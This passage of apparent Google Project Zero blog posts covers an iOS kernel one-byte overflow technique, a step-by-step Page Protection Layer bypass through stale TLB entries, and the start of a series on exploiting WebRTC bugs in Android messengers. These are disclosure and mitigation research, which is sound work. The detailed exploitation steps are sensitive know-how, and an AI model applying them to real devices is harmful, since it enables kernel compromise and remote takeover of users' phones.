ret = sb_evaluate(sandbox, 116u, &context);
if ( !ret )
{
    // Sandbox check sysctl-write
    if ( newlen | newptr && (namelen != 2 || name[0] != 0 || name[1] != 3) )
        ret = sb_evaluate(sandbox, 117u, &context);
    else
        ret = 0;
}

For some reason, if the sysctl node is deemed readable inside the sandbox, then the write check is not performed on the specific sysctl node { 0, 3 }! What this means is that { 0, 3 } will be writable in every sandbox from which it is readable, regardless of whether or not the sandbox profile allows writes to that sysctl.

As it turns out, the name of the sysctl { 0, 3 } is "sysctl.name2mib", which is a writable sysctl used to convert the string-name of a sysctl into the numeric form, which is faster to look up. It is used to implement sysctlnametomib(). So it makes sense that this sysctl should usually be writable.

The upshot is that even though there are no writable sysctls specified in the sandbox profile, sysctl { 0, 3 } is in fact writable anyways, allowing us to build a virtual write primitive alongside our read primitive. Thus, we now have full arbitrary kernel read/write.

III - The Return of the Copyout

The battle of pmap fields

We have come far, but the journey is not yet done: we must break the ring. As things stand, vm_map_copyout_internal() is spinning in an infinite loop on the "done" vm_map_entry, whose vme_next pointer points to itself. We must guide the safe return of this function to preserve the stability of the system.

Looking back to the vm_map_copyout_internal() function, we are currently spinning in an infinite loop on the "done" entry, having just finished mapping a page.


There are two basic issues preventing this. First, because we've inserted entries into our page tables at the pmap layer without creating corresponding virtual entries at the vm_map layer, there is currently an accounting conflict between the pmap and vm_map views of our address space. This will cause a panic on process exit if not addressed. Second, once the loop is broken, vm_map_copyout_internal() has a call to vm_map_copy_insert() that will panic trying to free the corrupted vm_map_copy to the wrong zone.

We will address the pmap/vm_map conflict first.

Suppose for the moment that we were able to break out of the for loop and allow vm_map_copyout_internal() to return. The call to vm_map_copy_insert() that occurs after the for loop walks through all the entries in the vm_map_copy, unlinks them from the vm_map_copy's entry list, and links them into the vm_map's entry list instead.

static void
vm_map_copy_insert(
    vm_map_t        map,
    vm_map_entry_t  after_where,
    vm_map_copy_t   copy)
{
    vm_map_entry_t  entry;

    while (vm_map_copy_first_entry(copy) !=
               vm_map_copy_to_entry(copy)) {
        entry = vm_map_copy_first_entry(copy);
        vm_map_copy_entry_unlink(copy, entry);
        vm_map_store_entry_link(map, after_where, entry,
            VM_MAP_KERNEL_FLAGS_NONE);
        after_where = entry;
    }
    zfree(vm_map_copy_zone, copy);
}

Since the vm_map_copy's vm_map_entrys are all fake objects residing in shared memory, we really do not want them linked into our vm_map's entry list, where they will be freed on process exit. The simplest solution is thus to update the corrupted vm_map_copy's entry list so that it appears to be empty.

Forcing the vm_map_copy's entry list to appear empty certainly lets us safely return from vm_map_copyout_internal(), but we would nevertheless still get a panic once our process exits:

panic(cpu 3 caller 0xfffffff01f4b1c50): "pmap_tte_deallocate(): pmap=0xfffffff06cd8fd10 ttep=0xfffffff0a90d0408 ptd=0xfffffff132fc3ca0 refcnt=0x2 \n"

The issue is that during the course of the exploit, our mapping primitive forces pmap_enter_options() to insert level 3 translation table entries (L3 TTEs) into our process's page tables, but the corresponding accounting at the vm_map layer never happens. This disagreement between the pmap and vm_map views matters because the pmap layer requires that all physical mappings be explicitly removed before the pmap can be destroyed, and the vm_map layer will not know to remove a physical mapping if there is no vm_map_entry describing the corresponding virtual mapping.

Due to PPL, we can not update the pmap directly, so the simplest solution is to grab a pointer to a legitimate vm_map_entry with faulted-in pages and overlay it on top of the virtual address range at which pmap_enter_options() established our physical mappings. Thus we will update the corrupted vm_map_copy's entry list so that it points to this single "overlay" entry instead.

The fires of stack doom

Finally, it is time to break vm_map_copyout_internal() out of the for loop.

    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {

The macro vm_map_copy_to_entry(copy) expands to:

    (struct vm_map_entry *)(&copy->c_u.hdr.links)

Thus, in order to break out of the loop, we need to process a vm_map_entry with vme_next pointing to the address of the c_u.hdr.links field in the corrupted vm_map_copy originally passed to this function.

The function is currently spinning on the "done" vm_map_entry, and we need to link in one final "overlay" vm_map_entry to address the pmap/vm_map accounting issue anyway. So the simplest way to break the loop is to modify the "overlay" entry's  vme_next to point to &copy->c_u.hdr.links. and then update the "done" entry's vme_next to point to the overlay entry.

To break out of the loop, we will have to link the "done" entry to an "overlay" entry that links back to the corrupted vm_map_copy.


The problem is the call to vm_map_copy_insert() mentioned earlier, which frees the vm_map_copy as if it were of  type ENTRY_LIST:

    zfree(vm_map_copy_zone, copy);

However, the object passed to zfree() is our corrupted vm_map_copy, which was allocated with kalloc(); trying to free it to the vm_map_copy_zone will panic. Thus, we somehow need to ensure that a different, legitimate vm_map_copy object gets passed to the zfree() instead.

Fortunately, if you check the disassembly of vm_map_copyout_internal(), the vm_map_copy pointer is spilled to the stack for the duration of the for loop!

FFFFFFF007C599A4     STR     X28, [SP,#0xF0+copy]
FFFFFFF007C599A8     LDR     X25, [X28,#vm_map_copy.links.next]
FFFFFFF007C599AC     CMP     X25, X27
FFFFFFF007C599B0     B.EQ    loc_FFFFFFF007C59B98
...                             ; The for loop
FFFFFFF007C59B98     LDP     X9, X19, [SP,#0xF0+dst_addr]
FFFFFFF007C59B9C     LDR     X8, [X19,#vm_map_copy.offset]

This makes it easy to ensure that the pointer passed to zfree() is a legitimate vm_map_copy allocated from the vm_map_copy_zone: just scan the kernel stack of the vm_map_copyout_internal() thread while it's still spinning and swap any pointers to the corrupted vm_map_copy with the legitimate one.

Replacing the corrupted vm_map_copy with a valid vm_map_copy that can be safely freed simply requires changing pointers on the kernel stack to point to the replacement copy instead.


At last, we have fixed up the state enough to allow vm_map_copyout_internal() to break the loop and return safely.

Homeward bound

Finally, with a virtual kernel read/write primitive and the vm_map_copyout_internal() thread safely returned, we have achieved our goal: a stable kernel compromise achieved by turning a one-byte controlled heap overflow directly into an arbitrary physical address mapping primitive.

Or rather, a nearly-arbitrary physical address mapping primitive. As we have seen, PPL-protected addresses like page table pages and DARTs cannot be mapped using this technique.

When I started on this journey, I had intended to demonstrate that the conventional approach of going after the kernel task port was both unnecessary and limiting, that other kernel read/write techniques could be equally powerful. I suspected that the introduction of Mach-port based techniques in iOS 10 had biased the sample of publicly-disclosed exploits in favor of Mach-port oriented vulnerabilities, and that this in turn obscured other techniques that were just as promising but publicly less well understood.

The one-byte technique initially seemed to offer a counterpoint to the mainstream exploit flow. After reading the code in vm_map.c and pmap.c, I had expected to be able to simply map all of DRAM into my address space and then implement kernel read/write by performing manual page table walks using those mappings. But it turned out that PPL blocks this technique on modern iOS by preventing certain pages from being mapped at all.

It's interesting to note that similar research was touched upon years ago as well, back when such a thing would have worked. While doing background research for this blog post, I came across a presentation by Azimuth called iOS 6 Kernel Security: A Hacker’s Guide that introduced no fewer than four separate primitives that could be constructed by corrupting various fields of vm_map_copy_t: an adjacent memory disclosure, an arbitrary memory disclosure, an extended heap overflow, and a combined address disclosure and heap overflow at the disclosed address.

A slide from an Azimuth presentation introducing the use of vm_map_copy_t in iOS kernel heap overflow attacks.


At the time of the presentation, the KERNEL_BUFFER type had a slightly different structure, so that c_u.hdr.links.next overlapped a field storing the vm_map_copy's kalloc() allocation size. It might have still been possible to turn a one-byte overflow into a physical memory mapping primitive on some platforms, but it would have been harder since it would require mapping the NULL page and a shared address space. However, a larger overflow like those used in the four aforementioned techniques could certainly change both the type and the c_u.hdr.links.next fields.

After its apparent public introduction in that Azimuth presentation by Mark Dowd and Tarjei Mandt, vm_map_copy corruption was repeatedly cited as a widely used exploit technique. See for example: From USR to SVC: Dissecting the 'evasi0n' Kernel Exploit by Tarjei Mandt; Tales from iOS 6 Exploitation by Stefan Esser; Attacking the XNU Kernel in El Capitan by Luca Todesco; Shooting the OS X El Capitan Kernel Like a Sniper by Liang Chen and Qidan He; iOS 10 - Kernel Heap Revisited by Stefan Esser; iOS kernel exploitation archaeology by Patroklos Argyroudis; and *OS Internals, Volume III: Security and Insecurity by Jonathan Levin, in particular Chapter 18 on TaiG. Given the prevalence of these other forms of vm_map_copy corruption, it would not surprise me to learn that someone had discovered the physical mapping primitive as well.

Then, in OS X 10.11 and iOS 9, the vm_map_copy struct was modified to remove the redundant allocation size and inline data pointer fields in KERNEL_BUFFER instances. It is possible that this was done to mitigate the frequent abuse of this structure in exploits, although it's hard to tell because those fields were redundant and could have been removed simply to clean up the code. Regardless, removing those fields changed vm_map_copy into its current form, weakening the precondition required to carry out this technique to a single byte overflow.

The mitigating of the Shire

So, how effective were the various iOS kernel exploit mitigations at blocking the one-byte technique, and how effective could they be if further hardened?

The mitigations I considered were KASLR, PAN, PAC, PPL, and zone_require. Many other mitigations exist, but either they don't apply to the heap overflow bug class or they aren't sensible candidates to mitigate this particular technique.

First, kernel address space layout randomization, or KASLR. KASLR can be divided into two parts: the sliding of the kernelcache image in virtual memory and the randomization of the kernel_map and submaps (zone_map, kalloc_map, etc.), collectively referred to as the "kernel heap". The kernel heap randomization means that you do need some way to determine the address of the kernel/user shared memory buffer in which we build the fake VM objects. However, once you have the address of the shared buffer, neither form of randomization has much bearing on this technique, for two reasons: First, generic iOS kernel heap shaping primitives exist that can be used to reliably place almost any allocation in the target kalloc zones before a vm_map_copy allocation, so randomization does not block the initial memory corruption. Second, after the corruption occurs, the primitive granted is arbitrary physical read/write, which is independent of virtual address randomization.

The only address randomization which does impact the core exploit technique is that of the kernelcache load address in physical memory. When iOS boots, iBoot loads the kernelcache into physical DRAM at a random address. As discussed in Part I, this physical randomization is quite small at 32 MB. However, improved randomization would not help because the AMCC hardware registers can be mapped to locate the kernelcache in physical memory regardless of where it is located.

Next consider PAN, or Privileged Access Never. This is an ARMv8.1 security mitigation that prevents the kernel from directly accessing userspace virtual memory, thereby preventing the common technique of overwriting pointers to kernel objects so that they point to fake objects living in userspace. Bypassing PAN is a prerequisite for this technique: we need to establish a complex hierarchy of vm_map_entry, vm_object, and vm_page objects at a known address. While hardcoding the shared buffer address is good enough for this POC, better techniques would be needed for a real exploit.

PAC, or Pointer Authentication Codes, is an ARMv8.3 security feature introduced in Apple's A12 SOC. The iOS kernel uses PAC for two purposes: first as an exploit mitigation against certain common bug classes and techniques, and second as a form of kernel control flow integrity to prevent an attacker with kernel read/write from gaining arbitrary code execution. In this setting, we're only interested in PAC as an exploit mitigation.

Apple's website has a table showing how various types of pointers are protected by PAC. Most of these pointers are automatically PAC-protected by the compiler, and the biggest impact of PAC so far is on C++ objects, especially in IOKit. Meanwhile, the one-byte exploit technique only involves vm_map_copy, vm_map_entry, vm_object, and vm_page objects, all plain C structs in the Mach part of the kernel, and so is unaffected by PAC.

However, at BlackHat 2019, Ivan Krstić of Apple announced that PAC would soon be used to protect certain "members of high value data structures", including "processes, tasks, codesigning, the virtual memory subsystem, [and] IPC structures". As of May 2020, this enhanced PAC protection has not yet been released, but if implemented it might prove effective at blocking the one-byte technique.

The next mitigation is PPL, which stands for Page Protection Layer. PPL creates a security boundary between the code that manages page tables and the rest of the XNU kernel. This is the only mitigation besides PAN that impacted the development of this exploit technique.

In practice, PPL could be much stricter about which physical addresses it allows to be mapped into a userspace process. For example, there is no legitimate use case for a userspace process to have access to kernelcache pages, so setting a flag like PVH_FLAG_LOCKDOWN on kernelcache pages could be a weak but sensible step. More generally, addresses outside the Application Processor's DRAM region (including physical I/O addresses for hardware components) could probably be made unmappable for most processes, perhaps with an entitlement escape hatch for exceptional cases.

Finally, the last mitigation is zone_require, a software mitigation introduced in iOS 13 that checks that some kernel pointers are allocated from the expected zalloc zone before using them. I don't believe that XNU's zone allocator was initially intended as a security mitigation, but the fact remains that many objects that are frequently targeted during exploits (in particular ipc_ports, tasks, and threads) are allocated from a dedicated zone. This makes zone checks an effective funnel point for detecting exploitation shenanigans.

In theory, zone_require could be used to protect almost any object allocated from a dedicated zone; in practice, though, the vast majority of zone_require() checks in the kernelcache are on ipc_port objects. Because the one-byte technique avoids the use of fake Mach ports altogether, none of the existing zone_require() checks apply.

However, if the use of zone_require were expanded, it is possible to partially mitigate the technique. In particular, inserting a zone_require() call in vm_map_copyout_internal() once the vm_map_copy has been determined to be of type ENTRY_LIST would ensure that the vm_map_copy cannot be a KERNEL_BUFFER object with a corrupted type. Of course, like all mitigations, this isn't 100% robust: using the technique in an exploit would probably still be possible, but it might require a better initial primitive than a one-byte overflow.

"Appendix A": Annals of the exploits

In my opinion, the one-byte exploit technique outlined in this blog post is a divergence from the conventional strategies employed at least since iOS 10. Fully 19 of the 24 original public exploits that I could find since iOS 10 used dangling or fake Mach ports as an intermediate exploitation primitive. And of the 20 exploits released since iOS 10.3 (when Apple initially started locking down the kernel task port), 18 of those ended by constructing a fake kernel task port. This makes Mach ports the defining feature of modern public iOS kernel exploitation.

Having gone through the motions of using the one-byte technique to build a kernel read/write primitive on top of a simulated heap overflow, I certainly can see the logic of going after the kernel task port instead. Most of the exploits I looked at since iOS 10 have a relatively modular design and a linear flow: an initial primitive is obtained, state is manipulated, an exploitation technique is applied to build a stronger primitive, state is manipulated again, another technique is applied after that, and so on, until finally you have enough to build a fake kernel task port. There are checkpoints along the way: initial corruption, dangling Mach port, 4-byte read primitive, etc. The exact sequence of steps in each case is different, but in broad strokes the designs of different exploits converge. And because of this convergence, the last steps of one exploit are pretty much interchangeable with those of any other. The design of it all "feels clean".

That modularity is not true of this one-byte technique. Once you start the vm_map_copyout_internal() loop, you are committed to this course until after you've obtained a kernel read/write primitive. And because vm_map_copyout_internal() holds the vm_map lock for the duration of the loop, you can't perform any of the virtual memory operations (like allocating virtual memory) that would normally be integral steps in a conventional exploit flow. Writing this exploit thus feels different, more messy.

All that said, and at the risk of sounding like I'm tooting my own horn, the one-byte technique intuitively feels to me somewhat more "technically elegant": it turns a weaker precondition directly into a very strong primitive while sidestepping most mitigations and avoiding most sources of instability and slowness seen in public iOS exploits. Of the 24 iOS exploits I looked at, 22 depend on reallocating a slot for an object that has been recently freed with another object, many doing so multiple times; with the notable exception of SockPuppet, this is an inherently risky operation because another thread could race to reallocate that slot instead. Furthermore, 11 of the 19 exploits since iOS 11 depend on forcing a zone garbage collection, an even riskier step that often takes a few seconds to complete.

Meanwhile, the one-byte technique has no inherent sources of instability or substantial time costs. It looks more like the type of technique I would expect sophisticated attackers would be interested in developing. And even if something goes wrong during the exploit and a bad address is dereferenced in the kernel, the fact that the vm_map lock is held means that the fault results in a deadlock rather than a kernel panic, making the failed exploit look like a frozen process instead of a system crash. (You can even "kill" the deadlocked app in the app switcher UI and then continue using the device afterwards.)

"Appendix B": Conclusions

I'll conclude by returning to the three questions posed at the very beginning of this post:

Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?

These questions are all too "fuzzy" to have real answers, but I'll attempt to answer them anyway.

To the first question, I think the answer is no, the kernel task port is not the singular best exploit flow. In my opinion the one-byte technique is just as good by most measures, and in my personal opinion, I expect there are other as-yet unpublished techniques that are also equally good.

To the second question, on whether the convergence on the kernel task port has obscured other techniques: I don't think there is enough public iOS research to say conclusively, but my intuition is yes. In my own experience, knowing the type of bug I'm looking for has influenced the types of bugs I find, and looking at past exploits has guided my choice in exploit flow. I would not be surprised to learn others feel similarly.

Finally, are existing iOS kernel exploit mitigations effective against unseen exploit flows? Immediately after I developed the POC for the one-byte technique, I had thought the answer was no; but here at the end of this journey, I'm less certain. I don't think PPL was specifically designed to prevent this technique, but it offers a very reasonable place to mitigate it. PAC didn't do anything to block the technique, but it's plausible that a future expansion of PAC-protected pointers would. And despite the fact that zone_require didn't impact the exploit at all, a single-line addition would strengthen the required precondition from a single-byte overflow to a larger overflow that crosses a zone boundary. So, even though in their current form Apple's kernel exploit mitigations were not effective against this unseen technique, they do lay the necessary groundwork to make mitigating the technique straightforward.

Indices

One final parting thought. In Deja-XNU, published 2018, Ian Beer mused about what the "state-of-the-art" of iOS kernel exploitation might have looked like four years prior:

An idea I've wanted to play with for a while is to revisit old bugs and try to exploit them again, but using what I've learnt in the meantime about iOS. My hope is that it would give an insight into what the state-of-the-art of iOS exploitation could have looked like a few years ago, and might prove helpful if extrapolated forwards to think about what state-of-the-art exploitation might look like now.

This is an important question to consider because, as defenders, we almost never get to see the capabilities of the most sophisticated attackers. If a gap develops between the techniques used by attackers in private and the techniques known to defenders, then defenders may waste resources mitigating against the wrong techniques.

I don't think this technique represents the current state-of-the-art; I'd guess that, like Deja-XNU, it might represent the state-of-the-art of a few years ago. It's worth considering what direction the state-of-the-art may have taken in the meantime.
✇Google Project Zero

The core of Apple is PPL: Breaking the XNU kernel's kernel

By: Tim
Posted by Brandon Azad, Project Zero

While doing research for the one-byte exploit technique, I considered several ways it might be possible to bypass Apple's Page Protection Layer (PPL) using just a physical address mapping primitive, that is, before obtaining kernel read/write or defeating PAC. Given that PPL is even more privileged than the rest of the XNU kernel, the idea of compromising PPL "before" XNU was appealing. In the end, though, I wasn't able to think of a way to break PPL using the physical mapping primitive alone.

PPL's goal is to prevent an attacker from modifying a process's executable code or page tables, even after obtaining kernel read/write/execute privileges. It does this by leveraging APRR to create something of a "kernel inside the kernel" that protects page tables. During normal kernel execution, page tables and page table metadata are read-only, and code that modifies page tables is non-executable; the only way for the kernel to modify page tables is to enter PPL by calling a "PPL routine", which is analogous to a syscall from XNU into PPL. This limits the entry points into the kernel code that can modify page tables to just those PPL routines.

I considered several ideas to bypass PPL using the one-byte technique's physical mapping primitive, including mapping page tables directly, mapping a DART to allow modifying physical memory from a coprocessor, and mapping the I/O addresses used to control clock gating to power down certain components of the system. Unfortunately, none of these ideas panned out.

However, it's not the Project Zero way to leave any mitigation unbroken. So, having exhausted my search for design flaws, I returned to the ever-faithful technique of memory corruption. Sure enough, decompiling a few PPL functions in IDA was sufficient to find some memory corruption.

Decompiler output showing a call to pmap_remove_range_options().
Some memory corruption in pmap_remove_options_internal(). Using a kernel function calling primitive, both va_start and size are controlled.

The function pmap_remove_options_internal() is a PPL routine, one of the "PPL syscalls" from the XNU kernel to the even more privileged PPL. It is called by invoking pmap_remove_options() in XNU, which validates arguments and then calls pmap_remove_options_internal() in PPL. Its purpose is to unmap the supplied virtual address range from the physical memory map (pmap) of a process.

MARK_AS_PMAP_TEXT static int
pmap_remove_options_internal(
        pmap_t pmap,
        vm_map_address_t start,
        vm_map_address_t end,
        int options)

The actual work of removing the translation table entries (TTEs) that map the supplied virtual address range is done by calling pmap_remove_range_options(), which takes pointers to the beginning and end of the TTE range to remove from the level 3 (leaf) translation table.

static int
pmap_remove_range_options(
        pmap_t pmap,
        pt_entry_t *bpte,   // The first L3 TTE to remove
        pt_entry_t *epte,   // The end of the TTEs
        uint32_t *rmv_cnt,
        int options)

Unfortunately, when pmap_remove_options_internal() calls pmap_remove_range_options(), it seems to assume that the supplied virtual address range will not cross an L3 translation table boundary, because if it does then the calculated TTE range will span out-of-bounds memory:

remove_count = pmap_remove_range_options(
                   pmap,
                   &l3_table[(va_start >> 14) & 0x7FF],
                   (u64 *)((char *)&l3_table[(va_start >> 14) & 0x7FF]
                         + ((size >> 11) & 0x1FFFFFFFFFFFF8LL)),
                   &rmv_spte,
                   options);

This means that if we have an arbitrary kernel function calling primitive, we can invoke the PPL-entering wrapper function directly and get pmap_remove_options_internal() called with an improper virtual address range, which makes pmap_remove_range_options() try to remove "TTEs" read from out-of-bounds memory while in PPL mode. And since the removed TTEs are zeroed out, this means that we can corrupt PPL-protected memory.

Calling pmap_remove_options_internal() with an address range spanning an L2 TTE boundary (that is, the address range requires two L2 TTEs to map it) will cause the processed TTE array to run off the end of the L3 translation table page, resulting in out-of-bounds TTEs being removed.


But zeroing out-of-bounds TTEs would be a rather annoying primitive to try and leverage for a PPL bypass. Much of the data we'd like to corrupt has probably already been allocated far away from our page tables, and PPL isn't a large enough code base that we're guaranteed to find something interesting we can do just by zeroing memory. And that's to say nothing of the accounting in PPL that would probably detect an attempt to unmap non-existent TTEs!

So instead I chose to focus on a side effect of this out-of-bounds processing: improper TLB invalidation.

Later on in pmap_remove_options_internal(), after the TTEs have been removed, the translation lookaside buffer (TLB) needs to be invalidated in order to ensure that the process cannot continue to access the unmapped pages through stale TLB entries.

    flush_mmu_tlb_region_asid_async(va_start, size, pmap);

This TLB flush occurs on the supplied virtual address range, not the removed TTEs. Thus, there could be a disagreement between the TLB entries invalidated and the L3 TTEs removed if the out-of-bounds TTEs were from a separate region of the process's address space, leaving stale TLB entries for those out-of-bounds TTEs.

By carefully controlling the layout of translation tables, it's possible to transform the out-of-bounds TTE removal into a different bug: improper TLB invalidation. This is because the out-of-bounds TTEs can correspond to discontiguous parts of the virtual address space, causing the set of TTEs removed to differ from the set of TLB entries flushed.


A stale TLB entry would allow a process to continue accessing the physical page after that page has been unmapped and potentially reused for page tables. So if we had a stale TLB entry for an L3 translation table, then we could insert L3 TTEs to map arbitrary PPL-protected pages as writable.

That's pretty much exactly how the PPL bypass works:

  1. Call the kernel function cpm_allocate() to allocate 2 pages of contiguous physical memory called A and B.
  2. Call pmap_mark_page_as_ppl_page() to insert pages A and B at the head of the ppl_page_list so they can be reused for page tables.
  3. Fault in pages for virtual addresses P and Q so that A and B are allocated as L3 TTs for mapping P and Q, respectively. P and Q are discontiguous but have TTEs that are contiguous.
  4. Start a spinner thread bound to a CPU core that reads from page Q in a loop to keep the TLB entry alive.
  5. Call pmap_remove_options() to remove 2 pages starting from virtual address P (which does not include Q). The vulnerability means that TTEs for both P and Q are removed, but only the TLB entry for P is invalidated.
  6. Call pmap_mark_page_as_ppl_page() to insert page Q at the head of the ppl_page_list so it can be reused for page tables.
  7. Fault in a page for virtual address R so that page Q is allocated as an L3 TT for R, even while we continue to have a stale TLB entry for Q.
  8. Using the stale TLB entry, write to page Q to insert an L3 TTE which maps Q itself as writable.

An animation showing the progression of the exploit over time. The vulnerability is used to establish a stale TLB entry for an unmapped page Q which then gets reallocated as an L3 translation table. The stale TLB entry for Q allows us to modify it and insert an L3 TTE mapping Q itself, which can then be used to modify page tables even after the stale TLB entry has been cleared.


This bypass was reported as Project Zero issue 2035 and fixed in iOS 13.6; you can find a POC that demonstrates how to map arbitrary physical addresses into EL0 there. Also, for a much more detailed look at exploiting improper TLB invalidation, check out Jann Horn's excellent blog post on the topic.

This bug demonstrates a common problem when creating a security boundary where none existed before. It's easy for code to make subtle assumptions about the security model (such as where argument validation occurs or what functionality is exposed vs. private) that no longer hold true under the new model. I wouldn't be surprised to see more bugs along this line in PPL.

Overall, though, I came away from this exercise impressed with the design of PPL. I think it's a sound mitigation with a clear security boundary that doesn't introduce more attack surface. My biggest criticism is that the value-add proposition of PPL is still not yet clear to me: What real-world attacks does PPL mitigate? Is it simply laying the groundwork for more sophisticated and powerful mitigations to come? Whatever the answer may be, I still prefer having it. Kudos to Apple for an interesting and well-thought-out mitigation.
✇Google Project Zero

Exploiting Android Messengers with WebRTC: Part 1

By: Tim
Posted by Natalie Silvanovich, Project Zero

This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. Part 2 is scheduled for August 5 and Part 3 is scheduled for August 6.

Part 1: First Attempts

WebRTC is an open source video conferencing solution used by a variety of software including browsers, messaging clients and streaming services. While Project Zero has reported several vulnerabilities in WebRTC in the past, it was not clear whether these bugs were exploitable, especially outside of browsers. I investigated whether two recent bugs are exploitable in popular Android messaging applications.

The Bugs


I started off by trying to exploit two bugs, CVE-2020-6389 and CVE-2020-6387.

Both of these vulnerabilities are in WebRTC’s Remote Transport Protocol (RTP) processing. RTP is the protocol WebRTC uses to transport audio and video content from peer to peer. RTP supports extensions, which are extra pieces of data that can be included in each packet to tell the destination peer how to display or process the data. For example, there is an extension that contains information about the screen orientation of the sending device, and one that contains the volume level. Both of these vulnerabilities occurred in extensions that had been implemented in WebRTC in 2019.

CVE-2020-6389 occurred in the frame marking extension, which contains information on how video content is split into frames. The bug is in how it processes layer information: WebRTC only supports five layers, but the layer number is a three-bit field in the extension, which means it can go as high as seven. This leads to an out-of-bounds write in the following code. temporal_idx is set from the layer number in the extension. 

if (layer_info_it->second[temporal_idx] != -1 &&
AheadOf<uint16_t>(layer_info_it->second[temporal_idx], frame->id.picture_id)) {
      // Not a newer frame. No subsequent layer info needs update.
     break;
   }
  ...
   layer_info_it->second[temporal_idx] = frame->id.picture_id;

The final line of code is where the out-of-bounds write occurs, as the array only contains five elements. This bug also has some limitations not obvious from the above code. To start, there is a check before the write, that checks whether the current value of the memory, casted to a 16-bit unsigned integer is more than the current sequence number. The write only occurs if this is true. Practically, this wasn’t much of a limitation, a crash usually occurred after two or three times when I tested it. A more serious limitation is that the layer_info_it->second field has a 64-bit integer type, but  frame->id.picture_id is a 16-bit integer. This means that while this bug allows an attacker to write up to three 64-bit integers outside of a fixed size heap buffer, the values that can be written are very limited, and are too small to represent pointers.

CVE-2020-6387 is a bug in how the video timing extension is processed by Forward Error Correction (FEC). FEC copies incoming RTP packets, and then clears certain extensions when attempting to correct errors. This vulnerability occurs because extensions of the video timing type are not verified to be of the expected length before they are cleared. The code causing this bug is as follows:

case RTPExtensionType::kRtpExtensionVideoTiming: {
       // Nullify 3 last entries: packetization delay and 2 network timestamps.
       // Each of them is 2 bytes.
       uint8_t* p = WriteAt(extension.offset) + VideoSendTiming::kPacerExitDeltaOffset;
       memset(
           p,
           0, 6);
       break;
     }

The value of VideoSendTiming::kPacerExitDeltaOffset is 7, so this code writes six zeros from offset 7 to offset 13 from the start of the extension in the packet. However, there is no check that the extension data is more than 13 bytes long, or even that the packet has this number of bytes left. The result of this bug is that an attacker can write up to six zeros to the heap at an offset of up to seven bytes from a variable sized heap buffer. This bug is better than CVE-2020-6389 in some ways and worse in others. It is better in that the heap buffer that can be overflowed is variable size, which gives a lot more options of what can be overwritten by this bug on the heap. The offset also offers some flexibility on where the zeros are written, and the write does not have to be aligned, whereas CVE-2020-6389 requires 64-bit alignment. This bug is worse in that the value written has to be zero, and the size of the area that can be written is smaller (six bytes versus 24).

Moving the Instruction Pointer


I started off by seeing if it was possible to use either of these bugs to move the instruction pointer. Modern Android uses jemalloc, a slab allocator which doesn’t use inline heap headers, so corrupting heap metadata was not an option. Instead, I compiled WebRTC for Android with symbols, and loaded it in IDA. I then went through the available object types to see if there was anything that could obviously be used to move the instruction pointer or improve the capabilities of the bug. I didn’t find anything.

I thought maybe I could use CVE-2020-6389 to overwrite a length and cause a larger overflow, but this had some problems. To start, the bug writes a 64-bit integer, meanwhile a lot of length fields are 32-bit integers, which means the write also overwrites something else, and can only write a non-zero value if the length is 64-bit aligned. The location of the bug in processing is also problematic, as it does the overwrite near the end of the incoming packet being processed, meaning that many objects are not accessed again after this point, so any overwritten memory would never be used again. CVE-2020-6389 also overwrites a heap buffer of fixed size 80, which limits the object types that can be affected by this bug. I didn’t think CVE-2020-6387 would be viable for this purpose either, as it can only write zeros, which can only make a length smaller.

I wasn’t sure where to go at this point, so I triggered CVE-2020-6389 a few dozen times on Android to see if there were any crashes at an address wider than 16-bits, hoping they might give me ideas of ways that this bug could influence the behavior of the code other than overwriting a pointer with an invalid 16-bit value. To my surprise, it crashed with the instruction pointer set to a value that had clearly been read off the heap about one in 20 times. 

Analyzing the crash, it turned out that a StunMessage object was being allocated after the overflowed region. The members of the StunMessage class are as follows.

protected:
  std::vector<std::unique_ptr<StunAttribute>> attrs_;
 ...
 private:
  ...
  uint16_t type_;
  uint16_t length_;
  std::string transaction_id_;
  uint32_t reduced_transaction_id_;
  uint32_t stun_magic_cookie_;

So after the vtable, the first member is a vector. How are vectors laid out in memory? It turns out its first two members are as follows.

  pointer __begin_;
  pointer __end_;

These pointers point to the beginning and the end of the vector’s contents in memory. During the crash, the __end_ member was overwritten with a small 16-bit integer. Vector iteration works by starting at the __begin_ pointer and incrementing until the  __end_ pointer is reached, so this change means that the next time the vector is iterated over, usually in the destructor, it will go out of bounds. Since this vector contains virtual objects of type StunAttribute, it will perform a virtual call to each element, to call its destructor. This virtual call on out-of-bounds memory was what was moving the instruction pointer.

This seemed like a reasonable way to control the instruction pointer, except for one problem: in a typical configuration, it is not possible for an attacker at one end of a WebRTC connection to send STUN to the user at the other, instead they each communicate with their own STUN server. I asked Philipp Hancke of webrtchacks if he knew of a way. He suggested this method, which involves specifying a TCP server controlled by the attacker as a potential routable path between two peers, called an ICE candidate. Both the attacker and target device will then communicate through this server, including STUN messages.

This allowed me to send STUN messages with an unusually large number of attributes. This was necessary because in order to control the instruction pointer, I would need to be able to control what showed up in memory after the STUN attribute vector. jemalloc allocates similar sized allocations, determined by predefined size classes in contiguous memory runs. The less used a size class is, the more likely it is that two objects of the same size class will be allocated one after the other. 

Typically, STUN messages have a small number of attributes, which translates to a vector buffer size of 32 or 64 bytes, which are both very frequently used size classes. Instead, I sent STUN messages with 128 attributes, which translated to a vector buffer size of 1024 bytes, which happens to be an infrequently used size class in WebRTC. By sending many STUN messages with this number of attributes, while at the same time sending RTP packets of size 1024 containing the desired pointer value, interspersed with packets containing the bug, I was able to get a virtual call on that pointer value about one in five times. This was good enough for use in an exploit, and I decided to move on to breaking ASLR.

Breaking ASLR


There were two possible approaches for breaking ASLR in this exploit. One was to use one of the above bugs to read memory and send it back to the attacker device or TCP server somehow, the other was to use some sort of crash oracle to determine the memory layout.

I started off by seeing whether it was possible to use one of the bugs to read memory remotely from the target device. Mark Brand suggested that it might be possible to use CVE-2020-6387 to accomplish this by setting the low bytes of a pointer to outgoing data to zero, causing out-of-bounds data to be sent instead of the actual data. This seemed like a promising approach, so I used IDA to look for potential objects.

